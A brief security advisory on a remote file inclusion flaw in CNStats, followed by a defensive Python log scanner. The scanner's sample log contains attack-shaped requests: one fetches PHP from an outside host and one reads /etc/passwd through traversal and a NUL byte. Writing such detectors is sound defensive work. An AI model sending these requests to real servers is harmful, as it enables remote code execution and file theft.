Web statistics software CNStats executes external code
Multiple bugs in CNStats, a web page access analysis application, allow attackers to execute their own PHP code on a server, which may give them access to the entire system. The who_r.php and who_s.php modules fail to filter the bj and bn parameters properly, so paths pointing to local or external PHP scripts can be passed in. This does, however, require register_globals to be turned on, contrary to security recommendations. The bug was found in version 2.9; the current version 2.12 is apparently also affected. The only remedy at present is to turn off register_globals.
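As an added example (not from the advisory or the CNStats project), a small Python scanner that flags web-server access-log requests to the two named modules whose bj or bn parameter carries a remote URL, a directory traversal or a NUL byte. The log lines are constructed, and the request shapes are assumed from the advisory's description rather than taken from the Milw0rm report.

```python
"""Flag access-log requests that look like file-inclusion attempts against
CNStats who_r.php / who_s.php via the bj and bn parameters. Added example;
the log lines below are constructed, not real traffic."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format sample (two suspicious, two benign).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /cnstats/who_r.php?bj=http://198.51.100.9/x.txt? HTTP/1.0" 200 512
203.0.113.5 - - [10/Oct/2006:13:55:37 +0000] "GET /cnstats/who_s.php?bn=../../../../etc/passwd%00 HTTP/1.0" 200 512
198.51.100.7 - - [10/Oct/2006:13:56:01 +0000] "GET /cnstats/who_r.php?bj=stats HTTP/1.1" 200 1024
198.51.100.7 - - [10/Oct/2006:13:56:02 +0000] "GET /cnstats/index.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
AFFECTED_SCRIPTS = {"who_r.php", "who_s.php"}   # modules named in the advisory
AFFECTED_PARAMS = {"bj", "bn"}                   # unfiltered parameters
# Suspicious: a URL scheme (remote include), "../" (local include outside
# the install directory) or a NUL byte (classic suffix-truncation trick).
SUSPICIOUS_RE = re.compile(r"^[a-z][a-z0-9+.-]*://|\.\./|\x00", re.IGNORECASE)

def suspicious_values(url):
    """Return [(param, value)] for affected params of an affected script."""
    parts = urlsplit(url)
    if parts.path.rsplit("/", 1)[-1] not in AFFECTED_SCRIPTS:
        return []
    hits = []
    for param, values in parse_qs(parts.query, keep_blank_values=True).items():
        if param not in AFFECTED_PARAMS:
            continue
        for value in values:
            # parse_qs already decoded once; a second unquote catches
            # double-encoded forms such as %252e%252e%252f.
            if SUSPICIOUS_RE.search(unquote(value)):
                hits.append((param, value))
    return hits

def scan_log(text):
    """Return [(client_ip, script_path, param, value)] for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = m.group(1)
        client_ip = line.split(" ", 1)[0]
        for param, value in suspicious_values(url):
            findings.append((client_ip, urlsplit(url).path, param, value))
    return findings
```

A hit only shows an attempt; whether the include actually succeeded still depends on the server having register_globals enabled, which is what the advisory says to turn off.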
- CNStats 2.9 Remote File Include Vulnerability, bug report on Milw0rm
(mba)